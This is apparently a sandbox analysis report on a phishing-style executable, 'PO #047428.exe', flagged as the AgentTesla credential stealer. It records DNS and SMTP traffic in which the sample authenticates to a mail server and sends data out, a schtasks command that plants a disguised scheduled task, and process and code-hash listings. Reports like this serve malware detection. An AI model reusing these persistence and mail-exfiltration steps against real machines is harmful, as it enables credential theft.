Jan 27, 2021 13:14:26.973234892 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:27.148835897 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:27.150003910 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:27.326154947 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:27.327487946 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:27.502935886 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:27.503010035 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:27.504328012 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:27.504445076 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:27.504498959 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:27.504589081 CET	49745	587	192.168.2.5	104.156.59.2
Jan 27, 2021 13:14:27.679713964 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:27.679752111 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:27.681430101 CET	587	49745	104.156.59.2	192.168.2.5
Jan 27, 2021 13:14:27.736028910 CET	49745	587	192.168.2.5	104.156.59.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 13:11:49.239687920 CET	65296	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:11:49.292037010 CET	53	65296	8.8.8.8	192.168.2.5
Jan 27, 2021 13:11:54.516767025 CET	63183	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:11:54.564560890 CET	53	63183	8.8.8.8	192.168.2.5
Jan 27, 2021 13:11:56.861926079 CET	60151	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:11:56.912578106 CET	53	60151	8.8.8.8	192.168.2.5
Jan 27, 2021 13:11:57.926856041 CET	56969	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:11:57.975069046 CET	53	56969	8.8.8.8	192.168.2.5
Jan 27, 2021 13:11:59.413841009 CET	55161	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:11:59.478260040 CET	53	55161	8.8.8.8	192.168.2.5
Jan 27, 2021 13:11:59.558176041 CET	54757	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:11:59.606023073 CET	53	54757	8.8.8.8	192.168.2.5
Jan 27, 2021 13:12:05.818551064 CET	49992	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:12:05.873873949 CET	53	49992	8.8.8.8	192.168.2.5
Jan 27, 2021 13:12:25.109540939 CET	60075	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:12:25.188776016 CET	53	60075	8.8.8.8	192.168.2.5
Jan 27, 2021 13:12:26.205130100 CET	55016	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:12:26.209884882 CET	64345	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:12:26.257829905 CET	53	64345	8.8.8.8	192.168.2.5
Jan 27, 2021 13:12:26.263848066 CET	53	55016	8.8.8.8	192.168.2.5
Jan 27, 2021 13:12:31.253313065 CET	57128	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:12:31.318413973 CET	53	57128	8.8.8.8	192.168.2.5
Jan 27, 2021 13:13:03.338419914 CET	54791	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:13:03.386257887 CET	53	54791	8.8.8.8	192.168.2.5
Jan 27, 2021 13:13:31.423767090 CET	50463	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:13:31.486869097 CET	53	50463	8.8.8.8	192.168.2.5
Jan 27, 2021 13:13:31.701952934 CET	50394	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:13:31.749855995 CET	53	50394	8.8.8.8	192.168.2.5
Jan 27, 2021 13:13:32.150835991 CET	58530	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:13:32.217750072 CET	53	58530	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:16.164825916 CET	53813	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:16.217674971 CET	53	53813	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:17.218534946 CET	63732	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:17.275002003 CET	53	63732	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:18.110426903 CET	57344	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:18.178098917 CET	53	57344	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:18.764511108 CET	54450	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:18.828217030 CET	53	54450	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:19.480567932 CET	59261	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:19.531405926 CET	53	59261	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:20.343158960 CET	57151	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:20.402504921 CET	53	57151	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:21.419926882 CET	59413	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:21.480988026 CET	53	59413	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:22.735508919 CET	60516	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:22.791809082 CET	53	60516	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:24.080977917 CET	51649	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:24.138858080 CET	53	51649	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:25.213275909 CET	65086	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:25.269854069 CET	53	65086	8.8.8.8	192.168.2.5
Jan 27, 2021 13:14:25.821088076 CET	56432	53	192.168.2.5	8.8.8.8
Jan 27, 2021 13:14:25.880100965 CET	53	56432	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 13:13:31.423767090 CET	192.168.2.5	8.8.8.8	0xf100	Standard query (0)	mail.sharqcapital.qa	A (IP address)	IN (0x0001)
Jan 27, 2021 13:14:25.821088076 CET	192.168.2.5	8.8.8.8	0x583c	Standard query (0)	mail.sharqcapital.qa	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 27, 2021 13:13:31.486869097 CET	8.8.8.8	192.168.2.5	0xf100	No error (0)	mail.sharqcapital.qa		104.156.59.2	A (IP address)	IN (0x0001)
Jan 27, 2021 13:14:25.880100965 CET	8.8.8.8	192.168.2.5	0x583c	No error (0)	mail.sharqcapital.qa		104.156.59.2	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 27, 2021 13:13:32.425972939 CET	587	49732	104.156.59.2	192.168.2.5	220-cpanel-002-fla.hostingww.com ESMTP Exim 4.93 #2 Wed, 27 Jan 2021 07:13:32 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 27, 2021 13:13:32.426815987 CET	49732	587	192.168.2.5	104.156.59.2	EHLO 284992
Jan 27, 2021 13:13:32.602416992 CET	587	49732	104.156.59.2	192.168.2.5	250-cpanel-002-fla.hostingww.com Hello 284992 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 27, 2021 13:13:32.604295969 CET	49732	587	192.168.2.5	104.156.59.2	AUTH login YWNjb3VudGFudEBzaGFycWNhcGl0YWwucWE=
Jan 27, 2021 13:13:32.779844046 CET	587	49732	104.156.59.2	192.168.2.5	334 UGFzc3dvcmQ6
Jan 27, 2021 13:13:32.964396000 CET	587	49732	104.156.59.2	192.168.2.5	235 Authentication succeeded
Jan 27, 2021 13:13:32.965574980 CET	49732	587	192.168.2.5	104.156.59.2	MAIL FROM:<accountant@sharqcapital.qa>
Jan 27, 2021 13:13:33.141422033 CET	587	49732	104.156.59.2	192.168.2.5	250 OK
Jan 27, 2021 13:13:33.142064095 CET	49732	587	192.168.2.5	104.156.59.2	RCPT TO:<accountant@sharqcapital.qa>
Jan 27, 2021 13:13:33.318150043 CET	587	49732	104.156.59.2	192.168.2.5	250 Accepted
Jan 27, 2021 13:13:33.318813086 CET	49732	587	192.168.2.5	104.156.59.2	DATA
Jan 27, 2021 13:13:33.496655941 CET	587	49732	104.156.59.2	192.168.2.5	354 Enter message, ending with "." on a line by itself
Jan 27, 2021 13:13:33.499865055 CET	49732	587	192.168.2.5	104.156.59.2	.
Jan 27, 2021 13:13:33.679169893 CET	587	49732	104.156.59.2	192.168.2.5	250 OK id=1l4jhV-00HFW6-Db
Jan 27, 2021 13:14:26.438112020 CET	587	49745	104.156.59.2	192.168.2.5	220-cpanel-002-fla.hostingww.com ESMTP Exim 4.93 #2 Wed, 27 Jan 2021 07:14:26 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 27, 2021 13:14:26.439798117 CET	49745	587	192.168.2.5	104.156.59.2	EHLO 284992
Jan 27, 2021 13:14:26.615257978 CET	587	49745	104.156.59.2	192.168.2.5	250-cpanel-002-fla.hostingww.com Hello 284992 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 27, 2021 13:14:26.615653038 CET	49745	587	192.168.2.5	104.156.59.2	AUTH login YWNjb3VudGFudEBzaGFycWNhcGl0YWwucWE=
Jan 27, 2021 13:14:26.791306973 CET	587	49745	104.156.59.2	192.168.2.5	334 UGFzc3dvcmQ6
Jan 27, 2021 13:14:26.972917080 CET	587	49745	104.156.59.2	192.168.2.5	235 Authentication succeeded
Jan 27, 2021 13:14:26.973234892 CET	49745	587	192.168.2.5	104.156.59.2	MAIL FROM:<accountant@sharqcapital.qa>
Jan 27, 2021 13:14:27.148835897 CET	587	49745	104.156.59.2	192.168.2.5	250 OK
Jan 27, 2021 13:14:27.150003910 CET	49745	587	192.168.2.5	104.156.59.2	RCPT TO:<accountant@sharqcapital.qa>
Jan 27, 2021 13:14:27.326154947 CET	587	49745	104.156.59.2	192.168.2.5	250 Accepted
Jan 27, 2021 13:14:27.327487946 CET	49745	587	192.168.2.5	104.156.59.2	DATA
Jan 27, 2021 13:14:27.503010035 CET	587	49745	104.156.59.2	192.168.2.5	354 Enter message, ending with "." on a line by itself
Jan 27, 2021 13:14:27.504589081 CET	49745	587	192.168.2.5	104.156.59.2	.
Jan 27, 2021 13:14:27.681430101 CET	587	49745	104.156.59.2	192.168.2.5	250 OK id=1l4jiN-00HGT5-Dn

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO #047428.exe PID: 4616 Parent PID: 5636

General

Start time:	13:11:41
Start date:	27/01/2021
Path:	C:\Users\user\Desktop\PO #047428.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO #047428.exe'
Imagebase:	0x7a0000
File size:	700416 bytes
MD5 hash:	747CE85EEF93567C5676649AEF9C00B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.256271000.0000000003DF5000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6220 Parent PID: 4616

General

Start time:	13:11:51
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmpA80C.tmp'
Imagebase:	0xe90000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6228 Parent PID: 6220

General

Start time:	13:11:51
Start date:	27/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PO #047428.exe PID: 6268 Parent PID: 4616

General

Start time:	13:11:52
Start date:	27/01/2021
Path:	C:\Users\user\Desktop\PO #047428.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xcd0000
File size:	700416 bytes
MD5 hash:	747CE85EEF93567C5676649AEF9C00B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.619632627.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.624912957.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: kprUEGC.exe PID: 5548 Parent PID: 3472

General

Start time:	13:12:21
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
Imagebase:	0xfd0000
File size:	700416 bytes
MD5 hash:	747CE85EEF93567C5676649AEF9C00B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.338811978.0000000004807000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 6112 Parent PID: 5548

General

Start time:	13:12:27
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yXAQfeQN' /XML 'C:\Users\user\AppData\Local\Temp\tmp3604.tmp'
Imagebase:	0xe90000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 716 Parent PID: 6112

General

Start time:	13:12:28
Start date:	27/01/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: kprUEGC.exe PID: 6212 Parent PID: 5548

General

Start time:	13:12:28
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3f0000
File size:	700416 bytes
MD5 hash:	747CE85EEF93567C5676649AEF9C00B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: kprUEGC.exe PID: 6276 Parent PID: 5548

General

Start time:	13:12:29
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xb30000
File size:	700416 bytes
MD5 hash:	747CE85EEF93567C5676649AEF9C00B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.619723039.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.624776782.0000000003021000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: kprUEGC.exe PID: 5472 Parent PID: 3472

General

Start time:	13:12:29
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe'
Imagebase:	0x540000
File size:	700416 bytes
MD5 hash:	747CE85EEF93567C5676649AEF9C00B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO #047428.exe PID: 4616 Parent PID: 5636 PO #047428.exeCOMMON

Executed Functions

Function 00F8E792, Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb80cd56adf1d8124bd8405c4c833a2090bdbc79ce9e151349996f65a3b7105
Instruction ID: 024aeb7b7eaa6fff990df01c6cfc72acec269fed38e3c5c410cb5e0e23ba065e
Opcode Fuzzy Hash: 4bb80cd56adf1d8124bd8405c4c833a2090bdbc79ce9e151349996f65a3b7105
Instruction Fuzzy Hash: 13C127B18217458AD720DF65ED8B19D7FB1BB85328F604219E2616FAD0DBBC144BCF88

Uniqueness

Uniqueness Score: -1.00%

Function 00F895B0, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F897F6

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2cd8a2808d98218031e9e1e3b1e772ba65e4be64126ed345bea62043e32a8d2a
Instruction ID: 23aad8ed76ce7971204488335ad2e8edb7189f658e19abd843a1b105d4ccb70c
Opcode Fuzzy Hash: 2cd8a2808d98218031e9e1e3b1e772ba65e4be64126ed345bea62043e32a8d2a
Instruction Fuzzy Hash: 21714570A04B058FD724EF2AD4417AABBF5BF88314F04892DD45ADBA40EB75E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F85365, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00F85421

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 439f107243610a785b2b343b08297bd0b8ee79b0a60508c47e4fc025143a60f5
Instruction ID: b0648a81b30a2d7df5fbcb15f193af0f74bc4971d6b5961777bf79e62001d2d0
Opcode Fuzzy Hash: 439f107243610a785b2b343b08297bd0b8ee79b0a60508c47e4fc025143a60f5
Instruction Fuzzy Hash: A1412371C04718CFDB24DFA9C888BCEBBB1BF48318F608169D509AB251DB75598ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F83E20, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00F85421

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: de7a0dad75b09cb4eebb24873339535fbeaf8b84df26ff6b22bc1e7d8e46fe17
Instruction ID: e9267f746a2a810b2160579cb7ff9238c3ef930e4c3dee64dcfe7de69ccb3634
Opcode Fuzzy Hash: de7a0dad75b09cb4eebb24873339535fbeaf8b84df26ff6b22bc1e7d8e46fe17
Instruction Fuzzy Hash: 0C41F371C04618CBDB24DFA9C888BCEBBB1BF48318F608069D509AB251D775598ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F89060, Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F89871,00000800,00000000,00000000), ref: 00F89A82

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0f3181c43870e9117a05b731461065d3fbfd35b16de7c3e0ce76a364dba25791
Instruction ID: 30b33848942ef37133a9db9dcb928262a35cba76820bae1aed7339c98d269dad
Opcode Fuzzy Hash: 0f3181c43870e9117a05b731461065d3fbfd35b16de7c3e0ce76a364dba25791
Instruction Fuzzy Hash: 2B21AEB2C083488FCB10DF99D884BEEBBF4EB58324F19841AD416A7740C3799545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F8ACBC, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F8BA96,?,?,?,?,?), ref: 00F8BB57

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0f7995f4667cff38b60fc8517f26342be565d4c0d262034af78045f5ab4c0ec8
Instruction ID: c435190757677ec8c9e145d19cbbe55ed364294dfbf4a3f514c335e0d064f67e
Opcode Fuzzy Hash: 0f7995f4667cff38b60fc8517f26342be565d4c0d262034af78045f5ab4c0ec8
Instruction Fuzzy Hash: A221E5B59002489FDB10DF99D884BDEBBF4EB48324F54841AE915A3310D374A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F89030, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F89871,00000800,00000000,00000000), ref: 00F89A82

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c11178ee593a1c4fb38ea53a3c48cabe6084293fcc2d7c051fdce838d4caf0b
Instruction ID: c87e818a4adc04d089cdd211ea1bcfe955b9b6eb501bcfecb71a25a58b4b5104
Opcode Fuzzy Hash: 9c11178ee593a1c4fb38ea53a3c48cabe6084293fcc2d7c051fdce838d4caf0b
Instruction Fuzzy Hash: C6213AB2C043498FCB10DF99D884BEEBBF4EB59324F19845AD555A7301C3749545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F8BACA, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F8BA96,?,?,?,?,?), ref: 00F8BB57

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c17f64e7dbf49f12f27bf0dc46e1673481fb8df5e6271ccb989804b42cc57aa4
Instruction ID: 6df68ad8e529de1791b5c8cd157af1a57dc0390a7c00e27bd50287ced8d08d53
Opcode Fuzzy Hash: c17f64e7dbf49f12f27bf0dc46e1673481fb8df5e6271ccb989804b42cc57aa4
Instruction Fuzzy Hash: 7621E0B5D00248AFDB10CFA9D984ADEBBF4EB48324F15841AE919A3310D378A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F89A12, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F89871,00000800,00000000,00000000), ref: 00F89A82

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e4c549964a29bfd5d307329c8a7cb5d7d813a04e8466477459f73ca4436924d2
Instruction ID: a994068eb6e49f4b3e6d620de7ba909ea2c9650ab056b750369d48a44250c9e7
Opcode Fuzzy Hash: e4c549964a29bfd5d307329c8a7cb5d7d813a04e8466477459f73ca4436924d2
Instruction Fuzzy Hash: 0A1108B6D002098FCB14DF99D444AEEFBF4AB98324F09841ED419A7600C3759549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F89048, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F89871,00000800,00000000,00000000), ref: 00F89A82

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e89a1c223f1d7f26c22e8be72b134aeabe44c676591e71698c10d560f00be657
Instruction ID: 3eb74b3f01a07d143b716169795d5cac814c1a5688bda2a8beb5c049708105e8
Opcode Fuzzy Hash: e89a1c223f1d7f26c22e8be72b134aeabe44c676591e71698c10d560f00be657
Instruction Fuzzy Hash: 031106B6D042099FCB14DF9AD444BEEFBF4EB58324F14842AD916B7600C3B9A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F89790, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F897F6

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 99cbfeb1682dafbcbf04b180516fa415ec1e5744fb1307798c531af7ad7a8112
Instruction ID: bd599b556d0c00452e4ccffd06c9aabf7c6591d4df96cc285c087c2c40272ad5
Opcode Fuzzy Hash: 99cbfeb1682dafbcbf04b180516fa415ec1e5744fb1307798c531af7ad7a8112
Instruction Fuzzy Hash: A411E3B5C006498FDB10DF9AD444BDEFBF4AB89324F15852AD819B7600C3B5A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E1D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254164844.0000000000E1D000.00000040.00000001.sdmp, Offset: 00E1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8fb474f7f487fceb44ea80a76fea442eb1a35a75788abf1c537093677db7d1
Instruction ID: be3a7e7beaa9c244f9e731689231404bb71fb334a6fbc011140321f9679a898a
Opcode Fuzzy Hash: 5e8fb474f7f487fceb44ea80a76fea442eb1a35a75788abf1c537093677db7d1
Instruction Fuzzy Hash: 9D213AB1508244DFDB05DF14DDC0BABBB65FB98328F24C569E90A5B206C336E896C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F3D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254207443.0000000000F3D000.00000040.00000001.sdmp, Offset: 00F3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff68e8c8637bb81f1bca42f76ff22a97de96ac2a9884f0d0d546ca6de862309
Instruction ID: e8c1abc1c069f3610941a7622c8510bebaf819d3d2b7b8fb519cc9b862fc1131
Opcode Fuzzy Hash: 4ff68e8c8637bb81f1bca42f76ff22a97de96ac2a9884f0d0d546ca6de862309
Instruction Fuzzy Hash: 112107F2908240DFCB18CF14E9C4B26BB65FB84734F24C969E94A4B24AC336D847DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F3D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254207443.0000000000F3D000.00000040.00000001.sdmp, Offset: 00F3D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5932d359b23ff61725cccf490f06ca0ae7140a7731834e046842abbae93d0d82
Instruction ID: 5e36c856fe20fddaf60860c17df8727308e2a3f7ff94d69459e6e012e7750fdd
Opcode Fuzzy Hash: 5932d359b23ff61725cccf490f06ca0ae7140a7731834e046842abbae93d0d82
Instruction Fuzzy Hash: 5E2180755093C08FCB06CF24D990B15BF71EB46324F28C5EAD8498B697C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E1D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254164844.0000000000E1D000.00000040.00000001.sdmp, Offset: 00E1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction ID: d805d7d00e35f9286fbc7fb84aa48a2dbaf91886e760339a0ac6675141aca692
Opcode Fuzzy Hash: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction Fuzzy Hash: 5F11E676408280DFCF15CF10D9C4B56BF71FB94324F28C6A9D8095B616C33AE89ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E1D731, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

